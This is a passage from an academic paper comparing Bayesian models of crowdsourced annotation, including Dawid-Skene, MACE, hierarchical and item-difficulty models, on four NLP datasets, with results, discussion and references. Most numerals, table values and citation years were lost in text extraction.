difficulties are instances of class-level hierarchical difficulties (see figure ). this is another example of a a two-class version of this model can be found in carpenter ( ) under the name “beta-binomial by anno- tator.” the argument of the softmax is a k-dimensional vector of annotator abilities given the true class, i.e., βjj[i,n],ci = (βjj[i,n],ci, , ...,βjj[i,n],ci,k). figure : plate diagram for the item difficulty model. partially pooled model. its generative process is presented here: • for every class k ∈{ , , ...,k}: – draw class difficulty means: ηk,k′ ∼ normal( , ),∀k′ ∈{ , ...,k} – draw class s.d.’s xk,k′ ∼ halfnormal( , ),∀k′ • draw class prevalence π ∼ dirichlet( k ) • for every item i ∈{ , , ...,i}: – draw true class ci ∼ categorical(π) – draw item difficulty θi,k ∼ normal(ηci,k,xci,k),∀k – for every position n ∈{ , , ...,ni}: ∗ draw annotation: yi,n ∼ categorical(softmax(θi)) logistic random effects (logrndeff) the last model is the logistic random effects model (carpenter, ), which assumes the annotations depend on both annotator abilities and item dif- ficulties (see figure ). both annotator and item parameters are drawn from hierarchical priors for partial pooling. its generative process is given as: • for every class k ∈{ , , ...,k}: – draw class ability means ζk,k′ ∼ normal( , ),∀k′ ∈{ , ...,k} – draw class ability s.d.’s Ωk,k′ ∼ halfnormal( , ),∀k′ – draw class difficulty s.d.’s xk,k′ ∼ halfnormal( , ),∀k′ • for every annotator j ∈{ , , ...,j}: – for every class k ∈{ , , ...,k}: ∗ draw class annotator abilities βj,k,k′ ∼ normal(ζk,k′, Ωk,k′ ),∀k′ • draw class prevalence π ∼ dirichlet( k ) figure : plate diagram for the logistic random effects model. • for every item i ∈{ , , ...,i}: – draw true class ci ∼ categorical(π) – draw item difficulty: θi,k ∼ normal( ,xci,k),∀k – for every position n ∈{ , , ...,ni}: ∗ draw annotation yi,n ∼ categorical(softmax(βjj[i,n],ci−θi)) implementation of the models we implemented all models in this paper in stan (carpenter et al., ), a tool for bayesian inference based on hamiltonian monte carlo. although the non-hierarchical models we present can be fit with (penalized) maximum likeli- hood (dawid and skene, ; passonneau and carpenter, ), there are several advantages to a bayesian approach. first and foremost, it pro- vides a mean for measuring predictive calibration for forecasting future results. for a well-specified model that matches the generative process, bayesian inference provides optimally calibrated inferences (bernardo and smith, ); for only roughly accurate models, calibration may be mea- sured for model comparison (gneiting et al., ). calibrated inference is critical for mak- ing optimal decisions, as well as for forecast- ing (berger, ). a second major benefit of bayesian inference is its flexibility in combining submodels in a computationally tractable manner. for example, predictors or features might be hierarchical models are challenging to fit with classical methods; the standard approach, maximum marginal likeli- hood, requires marginalizing the hierarchical parameters, fit- ting those with an optimizer, then plugging the hierarchical parameter estimates in and repeating the process on the coef- ficients (efron, ). this marginalization requires either a custom approximation per model in terms of either quadra- ture or markov chain monte carlo to compute the nested integral required for the marginal distribution that must be optimized first (martins et al., ). available to allow the simple categorical preva- lence model to be replaced with a multilogistic regression (raykar et al., ), features of the annotators may be used to convert that to a re- gression model, or semi-supervised training might be carried out by adding known gold-standard la- bels (van pelt and sorokin, ). each model can be implemented straightforwardly and fit ex- actly (up to some degree of arithmetic precision) using markov chain monte carlo methods, al- lowing a wide range of models to be evaluated. this is largely because posteriors are much bet- ter behaved than point estimates for hierarchical models, which require custom solutions on a per- model basis for fitting with classical approaches (rabe-hesketh and skrondal, ). both of these benefits make bayesian inference much simpler and more useful than classical point estimates and standard errors. convergence is assessed in a standard fash- ion using the approach proposed by gelman and rubin ( ): for each model we run four chains with diffuse initializations and verify that they converge to the same mean and variances (using the criterion r̂ < . ). hierarchical priors, when jointly fit with the rest of the parameters, will be as strong and thus sup- port as much pooling as evidenced by the data. for fixed priors on simplexes (probability parameters that must be non-negative and sum to . ), we use uniform distributions (i.e., dirichlet( k )). for lo- cation and scale parameters, we use weakly infor- mative normal and half-normal priors that inform the scale of the results, but are not otherwise sen- sitive. as with all priors, they trade some bias for variance and stabilize inferences when there is not much data. the exception is mace, for which we used the originally recommended priors, to con- form with the authors’ motivation. all model implementations are available to readers online at http://dali.eecs. qmul.ac.uk/papers/supplementary_ material.zip. evaluation the models of annotation discussed in this paper find their application in multiple tasks: to label items, characterize the annotators, or flag espe- cially difficult items. this section lays out the met- rics used in the evaluation of each of these tasks. dataset i n j k j/i i/j wsd rte temp pd table : general statistics (i items, n observations, j annotators, k classes) together with summary statis- tics for the number of annotators per item (j/i) and the number of items per annotator (i/j) (i.e., min, st quartile, median, mean, rd quartile, and max). . datasets we evaluate on a collection of datasets reflect- ing a variety of use-cases and conditions: binary vs. multi-class classification; small vs. large num- ber of annotators; sparse vs. abundant num- ber of items per annotator / annotators per item; and varying degrees of annotator quality (statis- tics presented in table ). three of the datasets— wsd, rte, and temp, created by snow et al. ( )—are widely used in the literature on an- notation models (carpenter, ; hovy et al., ). in addition, we include the phrase detec- tives . (pd) corpus (chamberlain et al., ), which differs in a number of key ways from the snow et al. ( ) datasets: it has a much larger number of items and annotations, greater sparsity, and a much greater likelihood of spamming due to its collection via a game-with-a-purpose setting. this dataset is also less artificial than the datasets in snow et al. ( ), which were created with the express purpose of testing crowdsourcing. the data consist of anaphoric annotations, which we reduce to four general classes (dn/do = discourse new/old, pr = property, and nr = non-referring). to ensure similarity with the snow et al. ( ) datasets, we also limit the coders to one annotation per item (discarded data were mostly redundant annotations). furthermore, this corpus allows us to evaluate on meta-data not usually available in traditional crowdsourcing platforms, namely, in- formation about confessed spammers and good, established players. . comparison against a gold standard the first model aspect we assess is how accu- rately they identify the correct (“true”) label of the items. the simplest way to do this is by com- paring the inferred labels against a gold standard, http://dali.eecs.qmul.ac.uk/papers/supplementary_material.zip http://dali.eecs.qmul.ac.uk/papers/supplementary_material.zip http://dali.eecs.qmul.ac.uk/papers/supplementary_material.zip using standard metrics such as precision / re- call / f-measure, as done, for example, for the evaluation of mace in hovy et al. ( ). we check whether the reported differences are statis- tically significant, using bootstrapping (the shift method), a non-parametric two-sided test (wilbur, ; smucker et al., ). we use a signifi- cance threshold of . and further report whether the significance still holds after applying the bonferroni correction for type errors. this type of evaluation, however, presupposes that a gold standard can be obtained. this as- sumption has been questioned by studies show- ing the extent of disagreement on annotation even among experts (poesio and artstein, ; passonneau and carpenter, ; plank et al., b). this motivates exploring complementary evaluation methods. . predictive accuracy in the statistical analysis literature, posterior predictions are a standard assessment method for bayesian models (gelman et al., ). we measure the predictive performance of each model using the log predictive density (lpd), that is, log p(ỹ|y), in a bayesian k-fold cross-validation setting (piironen and vehtari, ; vehtari et al., ). the set-up is straightforward: we partition the data into k subsets, each subset formed by splitting the annotations of each annotator into k random folds (we choose k = ). the splitting strategy ensures that models that cannot handle predictions for new annotators (i.e., unpooled models like d&s and mace) are nevertheless included in the comparison. concretely, we compute lpd = k∑ k= log p(ỹk|y(−k)) = k∑ k= log ∫ p(ỹk,θ|y(−k))dθ ≈ k∑ k= log m m∑ m= p(ỹk|θ(k,m)) ( ) in equation ( ), y(−k) and ỹk represent the items from the train and test data, for iteration k of the cross validation, while θ(k,m) is one draw from the posterior. . annotators’ characterization a key property of most of these models is that they provide a characterization of coder ability. in the d&s model, for instance, each annotator is modeled with a confusion matrix; passonneau and carpenter ( ) showed how different types of annotators (biased, spamming, adversarial) can be identified by examining this matrix. the same information is available in hierd&s and logrndeff, whereas mace characterizes coders by their level of credibility and spamming preference. we discuss these parameters with the help of the metadata provided by the pd corpus. some of the models (e.g., multinom or itemdiff) do not explicitly model annotators. however, an estimate of annotator accuracy can be derived post-inference for all the models. con- cretely, we define the accuracy of an annotator as the proportion of their annotations that match the inferred item-classes. this follows the cal- culation of gold-annotator accuracy (hovy et al., ), computed with respect to the gold standard. similar to hovy et al. ( ), we report the cor- relation between estimated and gold annotators’ accuracy. . item difficulty finally, the logrndeff model also provides an estimate that can be used to assess item difficulty. this parameter has an effect on the correctness of the annotators: namely, there is a subtractive relationship between the ability of an annotator and the item-difficulty parameter. the “difficulty” name is thus appropriate, although an examination of this parameter alone does not explicitly mark an item as difficult or easy. the itemdiff model does not model annotators and only uses the diffi- culty parameter, but the name is slightly mislead- ing because its probabilistic role changes in the absence of the other parameter (i.e., it now shows the most likely annotation classes for an item). these observations motivate an independent mea- sure of item difficulty, but there is no agreement on what such a measure could be. one approach is to relate the difficulty of an item to the confidence a model has in assigning it a label. this way, the difficulty of the items is judged under the subjectivity of the models, which in turn is influenced by their set of assumptions and data fitness. as in hovy et al. ( ), we mea- sure the model’s confidence via entropy to filter out the items the models are least confident in (i.e., the more difficult ones) and report accuracy trends. results this section assesses the six models along dif- ferent dimensions. the results are compared with those obtained with a simple majority vote (majvote) baseline. we do not compare the re- sults with non-probabilistic baselines as it has already been shown (see, e.g., quoc viet hung et al., ) that they underperform compared with a model of annotation. we follow the evaluation tasks and metrics dis- cussed in § and briefly summarized next. a core task for which models of annotation are used is to infer the correct interpretations from a crowd- sourced dataset of annotations. this evaluation is conducted first and consists of a comparison against a gold standard. one problem with this as- sessment is caused by ambiguity—previous stud- ies indicating disagreement even among experts. because obtaining a true gold standard is question- able, we further explore a complementary evalua- tion, assessing the predictive performance of the models, a standard evaluation approach from the literature on bayesian models. another core task models of annotation are used for is to character- ize the accuracy of the annotators and their error patterns. this is the third objective of this evalu- ation. finally, we conclude this section assessing the ability of the models to correctly diagnose the items for which potentially incorrect labels have been inferred. the pd data are too sparse to fit the models with item-level difficulties (i.e., itemdiff and logrndeff). these models are therefore not present in the evaluations conducted on the pd corpus. . comparison against a gold standard a core task models of annotation are used for is to infer the correct interpretations from crowd- annotated datasets. this section compares the inferred interpretations with a gold standard. tables , and present the results. on wsd and temp datasets (see table ), characterized by a small number of items and annotators (statis- tics in table ), the different model complexi- ties result in no gains, all the models performing the results for majvote, hierd&s, and logrndeff we report match or slightly outperform those reported by carpenter ( ) on the rte dataset. similar for mace, across wsd, rte, and temp datasets (hovy et al., ). model result statistical significance multinom . d&s* hierd&s* logrndeff* mace* d&s . itemdiff* majvote multinom* hierd&s . itemdiff* majvote* multinom* itemdiff . logrndeff* mace* d&s* hierd&s* logrndeff . majvote* multinom* itemdiff* mace . majvote* multinom* itemdiff* majvote . d&s hierd&s* logrndeff* mace* table : rte dataset results against the gold standard. both micro (accuracy) and macro (p, r, f) scores are the same. * indicates that significance ( . threshold) holds after applying the bonferroni correction. equivalently. statistically significant differences ( . threshold, plus bonferroni correction for type errors; see § . for details) are, however, very much present in tables (rte dataset) and (pd dataset). here the results are dominated by the unpooled (d&s and mace) and partially pooled models (logrndeff, and hierd&s, except for pd, as discussed later in § . ), which assume some form of annotator structure. further- more, modeling the full annotator response matrix leads in general to better results (e.g., d&s vs. mace on the pd dataset). ignoring completely any annotator structure is rarely appropriate, such models failing to capture the different levels of expertise the coders have—see the poor perfor- mance of the unpooled multinom model and of the partially pooled itemdiff model. similarly, the majvote baseline implicitly assumes equal expertise among coders, leading to poor perfor- mance results. . predictive accuracy ambiguity causes disagreement even among ex- perts, affecting the reliability of existing gold standards. this section presents a complementary evaluation, namely, predictive accuracy. in a simi- lar spirit to the results obtained in the comparison against the gold standard, modeling the ability of the annotators was also found to be essential for a good predictive performance (results presented accuracy (micro) f-measure (macro) model result statistical significance result statistical significance multinom . d&s* hierd&s* mace* majvote . d&s* hierd&s* mace* majvote* d&s . hierd&s* mace* majvote* multinom* . hierd&s* mace* majvote* multinom* hierd&s . mace* majvote* multinom* d&s* . majvote* multinom* d&s* mace . majvote* multinom* d&s* hierd&s* . majvote* multinom* d&s* majvote . multinom d&s* hierd&s* mace* . multinom* d&s* hierd&s* mace* precision (macro) recall (macro) model result statistical significance result statistical significance multinom . d&s* hierd&s* mace* majvote* . hierd&s* majvote* d&s . hierd&s* mace* multinom* . hierd&s mace majvote* hierd&s . mace* majvote* multinom* d&s* . mace* majvote* multinom* d&s mace . majvote multinom* d&s* hierd&s* . majvote* d&s hierd&s* majvote . multinom* hierd&s* mace . multinom* d&s* hierd&s* mace* table : pd dataset results against the gold standard. * indicates that significance holds after bonferroni correction. dataset model accµ pm rm fm wsd itemdiff . . . . logrndeff others . . . . temp majvote . . . . others . . . . table : results against the gold (µ = micro; m = macro). in table ). however, in this type of evaluation, the unpooled models can overfit, affecting their performance (e.g., a model of higher complex- ity like d&s, on a small dataset like wsd). the partially pooled models avoid overfitting through the hierarchical structure obtaining the best pre- dictive accuracy. ignoring the annotator structure (itemdiff and multinom) leads to poor per- formance on all datasets except for wsd, where this assumption is roughly appropriate since all the annotators have a very high proficiency (above %). . annotators’ characterization another core task models of annotation are used for is to characterize the accuracy and bias of the annotators. we first assess the correlation between the esti- mated and gold accuracy of the annotators. the re- sults, presented in table , follow the same pattern to those obtained in § . : a better performance of the unpooled (d&s and mace ) and partially pooled models (logrndeff and hierd&s, ex- cept for pd, as discussed later in § . ). the results the results of our reimplementation match the published ones (hovy et al., ). model wsd rte temp pd* multinom - . - . - . - . d&s - . - . - . - . hierd&s - . - . - . - . itemdiff - . - . - . - logrndeff - . - . - . - mace - . - . - . - . table : the log predictive density results, normalized to a per-item rate (i.e., lpd/i). larger values indicate a better predictive performance. pd* is a subset of pd such that each annotator has a number of annotations at least as big as the number of folds. are intuitive: a model that is accurate with respect to the gold standard should also obtain high corre- lation at annotator level. the pd corpus also comes with a list of self- confessed spammers and one of good, established players (see table for a few details). continuing with the correlation analysis, an inspection of the second-to-last column from table shows largely accurate results for the list of spammers. on the second category, however, the non-spammers (the last column), we see large differences between models, following the same pattern with the previ- ous correlation results. an inspection of the spam- mers’ annotations show an almost exclusive use of the dn (discourse new) class, which is highly prevalent in pd and easy for the models to infer; the non-spammers, on the other hand, make use of all the classes, making it more difficult to capture their behavior. in a typical coreference corpus, over % of mentions are dn; thus, always choosing dn results in a good accuracy level. the one-class preference is a common spamming be- havior (hovy et al., ; passonneau and carpenter, ). model wsd rte temp pd s ns majvote . . . . . . line multinom . . . . . . d&s . . . . . . hierd&s . . . . . . itemdiff . . . - - - logrndeff . . . - - - mace . . . . . . table : correlation between gold and estimated accu- racy of annotators. the last two columns refer to the list of known spammers and non-spammers in pd. type size gold accuracy quantiles spammers . . . non-spammers . . . table : statistics on player types. reported quantiles are . %, %, and . %. we further examine some useful parameter estimates for each player type. we chose one spammer and one non-spammer and discuss the confusion matrix inferred by d&s, together with the credibility and spamming preference given by mace. the two annotators were chosen to be rep- resentative for their type. the selection of the mod- els was guided by their two different approaches to capturing the behavior of the annotators. table presents the estimates for the annotator selected from the list of spammers. again, inspec- tion of the confusion matrix shows that, irrespec- tive of the true class, the spammer almost always produces the dn label. the mace estimates are similar, allocating credibility to this annotator, and full spamming preference for the dn class. in table we show the estimates for the anno- tator chosen from the non-spammers list. their response matrix indicates an overall good perfor- mance (see diagonal matrix), albeit with a con- fusion of pr (property) for dn (discourse new), which is not surprising given that indefinite nps (e.g., a policeman) are the most common type of mention in both classes. mace allocates large credibility to this annotator and shows a similar spamming preference for the dn class. this discussion, as well as the quantiles from table , show that poor accuracy is not by it- self a good indicator of spamming. a spammer like the one discussed in this section can obtain good performance by always choosing a class with high frequency in the gold standard. at the same time, a non-spammer may fail to recognize some true classes correctly, but be very good on oth- ers. bayesian models of annotation allow captur- d&s βj nr dn pr do nr . . . . dn . . . . pr . . . . do . . . . mace �j nr dn pr do . . . . θj . table : spammer analysis example. d&s provides a confusion matrix; mace shows the spamming prefer- ence and the credibility. d&s βj nr dn pr do nr . . . . dn . . . . pr . . . . do . . . . mace �j nr dn pr do . . . . θj . table : a non-spammer analysis example. d&s pro- vides a confusion matrix; mace shows the spamming preference and the credibility. ing and exploiting these observations. for a model like d&s, such a spammer presents no harm, as their contribution towards any potential true class of the item is the same and therefore cancels out. . filtering using model confidence this section assesses the ability of the models to correctly diagnose the items for which potentially incorrect labels have been inferred. concretely, we identify the items that the models are least confi- dent in (measured using the entropy of the poste- rior of the true class distribution) and present the accuracy trends as we vary the proportion of fil- tered out items. overall, the trends (figures , and ) indicate that filtering out the items with low confidence improves the accuracy of all the models and across all datasets. point also made by passonneau and carpenter ( ). the trends for mace match the published ones. also, we left out the analysis on the wsd dataset, as the models already obtain % accuracy without any filtering (see § . ). figure : effect of filtering on rte: accuracy (y-axis) vs. proportion of data with lowest entropy (x-axis). figure : temp dataset: accuracy (y-axis) vs. propor- tion of data with lowest entropy (x-axis). discussion we found significant differences across a number of dimensions between both the annotation models and between the models and majvote. . observations and guidelines the completely pooled model (multinom) un- derperforms in almost all types of evaluation and all datasets. its weakness derives from its core as- sumption: it is rarely appropriate in crowdsourc- ing to assume that all annotators have the same ability. the unpooled models (d&s and mace) as- sume each annotator has their own response pa- rameter. these models can capture the accuracy and bias of annotators, and perform well in all evaluations against the gold standard. lower performance is obtained, however, on posterior predictions: the higher complexity of unpooled models results in overfitting, which affects their predictive performance. the partially pooled models (itemdiff, hierd&s, and logrndeff) assume both figure : pd dataset: accuracy (y-axis) vs. proportion of data with lowest entropy (x-axis). individual and hierarchical structure (capturing population behavior). these models achieve the best of both worlds, letting the data determine the level of pooling that is required: they asymptote to the unpooled models if there is a lot of variance among the individuals in the population, or to the fully pooled models when the variance is very low. this flexibility ensures good performance both in the evaluations against the gold standard and in terms of their predictive performance. across the different types of pooling, the mod- els that assume some form of annotator structure (d&s, mace, logrndeff, and hierd&s) came out on top in all evaluations. the unpooled models (d&s and mace) register on par performance with the partially pooled ones (logrndeff and hierd&s, except for the pd dataset, as discussed later in this section) in the evaluations against the gold standard, but as pre- viously mentioned, can overfit, affecting their predictive performance. ignoring any annotator structure (the pooled multinom model, the par- tially pooled itemdiff model, or the majvote baseline) leads generally to poor performance results. the approach we took in this paper is domain- independent, that is, we did not assess and com- pare models that use features extracted from the data, even though it is known that when such fea- tures are available, they are likely to help (raykar et al., ; felt et al., a; kamar et al., ). this is because a proper assessment of such mod- els would also require a careful selection of the features and how to include them into a model of annotation. a bad (i.e., misspecified in the statistical sense) domain model is going to hurt more than help as it will bias the other estimates. providing guidelines for this feature-based analysis would have excessively expanded the scope of this paper. but feature-based models of annotation are extensions of the standard annotation-only mod- els; thus, this paper can serve as a foundation for the development of such models. a few exam- ples of feature-based extensions of standard mod- els of annotation are given in § to guide readers who may want to try them out for their specific task/domain. the domain-independent approach we took in this paper further implies that there are no dif- ferences between applying these models to cor- pus annotation or other crowdsourcing tasks. this paper is focused on resource creation and does not propose to investigate the performance of the models in downstream tasks. however, previous work already used such models of annotation for nlp (plank et al., a; sabou et al., ; habernal and gurevych, , image labeling (smyth et al., ; kamar et al., ), or med- ical (albert and dodd, ; raykar et al., ) tasks. although hierd&s normally achieves the best performance in all evaluations on the snow et al. ( ) datasets, on the pd data it is outper- formed by the unpooled models (mace and d&s). to understand this discrepancy, note that the datasets from snow et al. ( ) were pro- duced using amazon mechanical turk, by mainly highly skilled annotators; whereas the pd dataset was produced in a game-with-a-purpose setting, where most of the annotations were made by only a handful of coders of high quality, the rest be- ing produced by a large number of annotators with much lower abilities. these observations point to a single population of annotators in the former datasets, and to two groups in the latter case. the reason why the unpooled models (mace and d&s) outperform the partially pooled hierd&s model on the pd data is that this class of mod- els assumes no population structure—hence, there is no hierarchical influence; a multi-modal hierar- chical prior in hierd&s might be better suited for the pd data. this further suggests that results depend to some extent on the dataset specifics. this does not alter the general guidelines made in this paper. . technical notes posterior curvature. in hierarchical models, a complicated posterior curvature increases the dif- ficulty of the sampling process affecting con- vergence. this may happen when the data are sparse or when there are large inter-group vari- ances. one way to overcome this problem is to use a non-centered parameterization (betancourt and girolami ). this approach separates the lo- cal parameters from their parents, easing the sam- pling process. this often improves the effective sample size and, ultimately, the convergence (i.e., lower r̂). the non-centered parameterization of- fers an alternative but equivalent implementation of a model. we found this essential to ensure a robust implementation of the partially pooled models. label switching. the label switching problem that occurs in mixture models is due to the like- lihood’s invariance under the permutation of the labels. this makes the models nonidentifiable. convergence cannot be directly assessed, because the chains will no longer overlap. we use a gen- eral solution to this problem from gelman et al. ( ): re-label the parameters, post-inference, based on a permutation that minimizes some loss function. for this survey, we used a small ran- dom sample of the gold data (e.g., five items per class) to find the permutation that maximizes model accuracy for every chain-fit. we then re- labeled the parameters of each chain according to the chain-specific permutation before combining them for convergence assessment. this ensures model identifiability and gold alignment. related work bayesian models of annotation share many char- acteristics with so called item-response and ideal- point models. a popular application of these models is to analyze data associated with indi- viduals and test items. a classic example is the rasch model (rasch, ) which assumes that the probability of a person being correct on a test item is based on a subtractive relationship be- tween their ability and the difficulty of the item. the model takes a supervised approach to jointly estimating the ability of the individuals and the difficulty of the test items based on the correct- ness of their responses. the models of annota- tion we discussed in this paper are completely unsupervised and infer, in addition to annotator ability and/or item difficulty, the correct labels. more details on item-response models are given in skrondal and rabe-hesketh ( ) and gelman and hill ( ). item-response theory has also been recently applied to nlp applications (lalor et al., ; martınez-plumed et al., ; lalor et al., ). the models considered so far take into account only the annotations. there is work, however, that further exploits the features that can accompany items. a popular example is the model introduced by raykar et al. ( ), where the true class of an item is made to depend both on the annotations and on a logistic regression model that are jointly fit; essentially, the logistic regression replaces the simple categorical model of prevalence. felt et al. ( , b) introduced similar models that also modeled the predictors (features) and compared them to other approaches (felt et al., a). kamar et al. ( ) account for task-specific fea- ture effects on the annotations. in § . , we discussed the label switching prob- lem (stephens, ) that many models of an- notation suffer from. other solutions proposed in the literature include utilizing class-informative priors, imposing ordering constraints (obvious for univariate parameters; less so in multivariate cases) (gelman et al., ), or applying different post-inference relabeling techniques (felt et al., ). conclusions this study aims to promote the use of bayesian models of annotation by the nlp community. these models offer substantial advantages over both agreement statistics (used to judge coding standards), and over majority-voting aggregation to generate gold standards (even when used with heuristic censoring or adjudication). to provide assistance in this direction, we compare six existing models of annotation with distinct prior and likelihood structures (e.g., pooled, unpooled, and partially pooled) and a diverse set of effects (annotator ability, item difficulty, or a subtractive relationship between the two). we use various evaluation settings on four datasets, with different levels of sparsity and annotator accuracy, and report significant differences both among the models, and between models and majority voting. as importantly, we provide guidelines to both aid users in the selection of the models and to raise awareness of the technical aspects essential to their implementation. we release all models evaluated here as stan implementations at http://dali.eecs.qmul.ac.uk/paper/ supplementary_material.zip. acknowledgments paun, chamberlain, and poesio are supported by the dali project, funded by erc. carpenter is partly supported by the u.s. national science foundation and the u.s. office of naval research. references paul s. albert and lori e. dodd. . a caution- ary note on the robustness of latent class models for estimating diagnostic error without a gold standard. biometrics, ( ): – . ron artstein and massimo poesio. . inter- coder agreement for computational linguistics. computational linguistics, ( ): – . james o. berger. . statistical decision the- ory and bayesian analysis. springer. josé m. bernardo and adrian f. m. smith. . bayesian theory. iop publishing. michael betancourt and mark girolami. . hamiltonian monte carlo for hierarchical mod- els. current trends in bayesian methodology with applications, : . bob carpenter. . multilevel bayesian mod- els of categorical data annotation. unpublished manuscript. bob carpenter, andrew gelman, matt hoffman, daniel lee, ben goodrich, michael betancourt, michael a. brubaker, jiqiang guo, peter li, and allen riddell. . stan: a probabilistic programming language. journal of statistical software, ( ): – . jon chamberlain, massimo poesio, and udo kruschwitz. . phrase detectives corpus . : crowdsourced anaphoric coreference. in pro- ceedings of the international conference on language resources and evaluation (lrec ), portoroz, slovenia. alexander philip dawid and allan m. skene. . maximum likelihood estimation of ob- server error-rates using the em algorithm. ap- plied statistics, ( ): – . http://dali.eecs.qmul.ac.uk/papers/supplementary_material.zip http://dali.eecs.qmul.ac.uk/papers/supplementary_material.zip https://doi.org/ . /j. - x. . .x https://doi.org/ . /j. - x. . .x https://doi.org/ . /j. - x. . .x https://doi.org/ . /j. - x. . .x https://lingpipe.files.wordpress.com/ / /carp-bayesian-multilevel-annotation.pdf https://lingpipe.files.wordpress.com/ / /carp-bayesian-multilevel-annotation.pdf https://doi.org/ . /jss.v .i https://doi.org/ . /jss.v .i bradley efron. . large-scale inference: em- pirical bayes methods for estimation, testing, and prediction, volume . cambridge univer- sity press. alvan r. feinstein and domenic v. cicchetti. . high agreement but low kappa: i. the problems of two paradoxes. journal of clinical epidemiology, ( ): – . paul felt, kevin black, eric ringger, kevin seppi, and robbie haertel. a. early gains matter: a case for preferring generative over discrimi- native crowdsourcing models. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies. paul felt, robbie haertel, eric k. ringger, and kevin d. seppi. . momresp: a bayesian model for multi-annotator document labeling. in proceedings of the international conference on language resources and eval- uation (lrec ), reykjavik. paul felt, eric k. ringger, jordan boyd-graber, and kevin seppi. b. making the most of crowdsourced document annotations: confused supervised lda. in proceedings of the nine- teenth conference on computational natural language learning, pages – . andrew gelman, john b. carlin, hal s. stern, david b. dunson, aki vehtari, and donald b. rubin. . bayesian data analysis, third edition. chapman & hall/crc texts in sta- tistical science. taylor & francis. andrew gelman and jennifer hill. . data analysis using regression and multi- level/hierarchical models. analytical methods for social research. cambridge university press. andrew gelman and donald b. rubin. . in- ference from iterative simulation using multiple sequences. statistical science, : – . tilmann gneiting, fadoua balabdaoui, and adrian e. raftery. . probabilistic fore- casts, calibration and sharpness. journal of the royal statistical society: series b (statistical methodology), ( ): – . ivan habernal and iryna gurevych. . what makes a convincing argument? empirical anal- ysis and detecting attributes of convincingness in web argumentation. in proceedings of the conference on empirical methods in nat- ural language processing, pages – . dirk hovy, taylor berg-kirkpatrick, ashish vaswani, and eduard hovy. . learning whom to trust with mace. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – . ece kamar, ashish kapoor, and eric horvitz. . identifying and accounting for task- dependent bias in crowdsourcing. in third aaai conference on human computation and crowdsourcing. hyun-chul kim and zoubin ghahramani. . bayesian classifier combination. in proceed- ings of the fifteenth international confer- ence on artificial intelligence and statistics, pages – , la palma, canary islands. john lalor, hao wu, and hong yu. . build- ing an evaluation scale using item response the- ory. in proceedings of the conference on empirical methods in natural language pro- cessing, pages – . association for com- putational linguistics. john p. lalor, hao wu, and hong yu. . improving machine learning ability with fine- tuning. corr, abs/ . . version . matthew lease and gabriella kazai. . overview of the trec crowdsourcing track. in proceedings of the text retrieval con- ference (trec). fernando martınez-plumed, ricardo b. c. prudêncio, adolfo martınez-usó, and josé hernández-orallo. . making sense of item response theory in machine learning. in proceedings of nd european conference on artificial intelligence (ecai), frontiers in artificial intelligence and applications, volume , pages – . thiago g. martins, daniel simpson, finn lindgren, and håvard rue. . bayesian computing https://books.google.co.uk/books?id=zxl aqaaqbaj https://books.google.co.uk/books?id=zxl aqaaqbaj https://books.google.co.uk/books?id=lv didv f ac https://books.google.co.uk/books?id=lv didv f ac https://doi.org/ . /ss/ https://doi.org/ . /ss/ https://doi.org/ . /ss/ https://doi.org/ . /v /d - https://doi.org/ . /v /d - https://doi.org/ . /v /d - http://arxiv.org/abs/ . http://arxiv.org/abs/ . with inla: new features. computational statistics & data analysis, : – . pablo g. moreno, antonio artés-rodríguez, yee whye teh, and fernando perez-cruz. . bayesian nonparametric crowdsourcing. jour- nal of machine learning research. rebecca j. passonneau and bob carpenter. . the benefits of a model of annotation. transac- tions of the association for computational lin- guistics, : – . juho piironen and aki vehtari. . comparison of bayesian predictive methods for model selec- tion. statistics and computing, ( ): – . barbara plank, dirk hovy, ryan mcdonald, and anders søgaard. a. adapting taggers to twitter with not-so-distant supervision. in proceedings of coling , the th inter- national conference on computational linguis- tics: technical papers, pages – . barbara plank, dirk hovy, and anders sogaard. b. linguistically debatable or just plain wrong? in proceedings of the nd annual meeting of the association for computational linguistics (volume : short papers). massimo poesio and ron artstein. . the re- liability of anaphoric annotation, reconsidered: taking ambiguity into account. in proceedings of acl workshop on frontiers in corpus anno- tation, pages – . nguyen quoc viet hung, nguyen thanh tam, lam ngoc tran, and karl aberer. . an evaluation of aggregation techniques in crowd- sourcing. in web information systems engi- neering – wise , pages – , berlin, heidelberg. springer berlin heidelberg. sophia rabe-hesketh and anders skrondal. . generalized linear mixed-effects models. lon- gitudinal data analysis, pages – . georg rasch. . probabilistic models for some intelligence and attainment tests. eric. vikas c. raykar, shipeng yu, linda h. zhao, gerardo hermosillo valadez, charles florin, luca bogoni, and linda moy. . learning from crowds. journal of machine learning re- search, : – . marta sabou, kalina bontcheva, leon derczynski, and arno scharl. . corpus annotation through crowdsourcing: towards best practice guidelines. in proceedings of the ninth interna- tional conference on language resources and evaluation (lrec- ), pages – . aashish sheshadri and matthew lease. . square: a benchmark for research on com- puting crowd consensus. in proceedings of the st aaai conference on human computation (hcomp), pages – . edwin simpson, stephen roberts, ioannis psorakis, and arfon smith. . dynamic bayesian combination of multiple imperfect classifiers. springer berlin heidelberg, berlin, heidelberg. anders skrondal and sophia rabe-hesketh. . generalized latent variable modeling: mul- tilevel, longitudinal, and structural equation models. chapman & hall/crc interdisci- plinary statistics. taylor & francis. mark d. smucker, james allan, and ben carterette. . a comparison of statisti- cal significance tests for information retrieval evaluation. in proceedings of the sixteenth acm conference on conference on informa- tion and knowledge management, cikm ’ , pages – , new york, ny, usa. acm. padhraic smyth, usama m. fayyad, michael c. burl, pietro perona, and pierre baldi. . in- ferring ground truth from subjective labelling of venus images. in advances in neural informa- tion processing systems, pages – . rion snow, brendan o’connor, daniel jurafsky, and andrew y. ng. . cheap and fast - but is it good? evaluating non-expert annotations for natural language tasks. in proceedings of the conference on empirical methods in natu- ral language processing, pages – . matthew stephens. . dealing with label switching in mixture models. journal of the royal statistical society: series b (statistical methodology), ( ): – . chris van pelt and alex sorokin. . de- signing a scalable crowdsourcing platform. in https://doi.org/ . /s - - -y https://doi.org/ . /s - - -y https://doi.org/ . /s - - -y http://ir.ischool.utexas.edu/square/documents/sheshadri.pdf http://ir.ischool.utexas.edu/square/documents/sheshadri.pdf https://doi.org/ . / - - - - _ https://doi.org/ . / - - - - _ https://doi.org/ . / - - - - _ https://books.google.ro/books?id=jjr agaaqbaj https://books.google.ro/books?id=jjr agaaqbaj https://books.google.ro/books?id=jjr agaaqbaj https://doi.org/ . / . https://doi.org/ . / . https://doi.org/ . / . https://doi.org/ . / - . https://doi.org/ . / - . proceedings of the acm sigmod inter- national conference on management of data, 